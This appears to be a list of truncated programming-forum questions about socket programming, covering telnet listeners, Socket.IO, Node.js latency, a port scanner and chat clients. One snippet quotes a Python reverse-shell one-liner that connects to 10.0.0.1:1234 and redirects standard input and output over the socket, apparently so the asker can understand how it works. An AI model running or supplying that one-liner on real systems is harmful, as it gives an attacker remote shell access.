I did create a program that listens on a port and prints the message out on the terminal. My problem is, that I want to connect with telnet (telnet localhost 13
Hi I want to implement a ring of sockets .For example IP address 127.0.0.1 listens to 127.0.0.3 and this one listens to 127.0.0.2. They are supposed to share so
In a python-written server with TCP socket defined as follows: def create_tcp_socket(bind_address): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
After forcing off the "Local line editing" at Putty (Raw mode), all chars typed are sent to the server without the Enter (checked it with Wireshark). I have thi
I am learning linux socket programming, I expect that server can read data, even I add a delay but it just drops the buffer data, and receive the recent data, t
I am trying to implement the video call functionality in socket io. The issue is that wheneverthe previously joined user lefts the call, his video is not remove
I am making a Nodejs Multiplayer game. PROBLEM: After a period of time, around a few seconds, the latency between the server to client skyrockets. Not just a li
So I have an image processing algorithm doing crack detection written in Python and I want to have this work on the Hololens (in Unity). I don't have any experi
Working on a simple port scanner that allows user to input an IP address as well as a set of ports to scan through ie a lower boundary port and an upper boundar
I have a fairly simple http client using libevent's evhttp functions. It works almost perfectly, but it eventually fails with 'too many open files'. The client
I am using python and socket, I want to use a proxy list, but I am not estbalishing a http connection(Or am I??), but I am using it to ping a ip, I would like t
Consider: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(
I want to split up the following workflow of a C++ program: Read serialized data (1 sec, which is already very fast for that size) Search data (0.01 ms) Return
I'm trying to learn about sockets, and most simple examples online have either the client or server doing most of the send()'ing and the other doing most of the
I'm trying to send a simple message from my mobile to my laptop through socket programming in python. I'm using win 10 and python 3.7.4 on my laptop. I am also
In my case, the member variable is socket. But this question can be general for any member variable which needs some operations before the object is deleted. I
hello everyone thanks for reading this , is it possible to send video stream from client side to nodejs server then save it to a file each time there is a new c
I just started using Postman. I had this error "Error: socket hang up" when I was executing a collection runner. I've read a few post regarding socket hang up a
I am trying to create a simple Io-web-chat. I recently wanted to seperate my <script> inside my html file to an external js file. this is my very simple
Till now I have a Server, Client1 and a Client2. The code works all fine and you can send messages between each Clients. The output looks something like this (b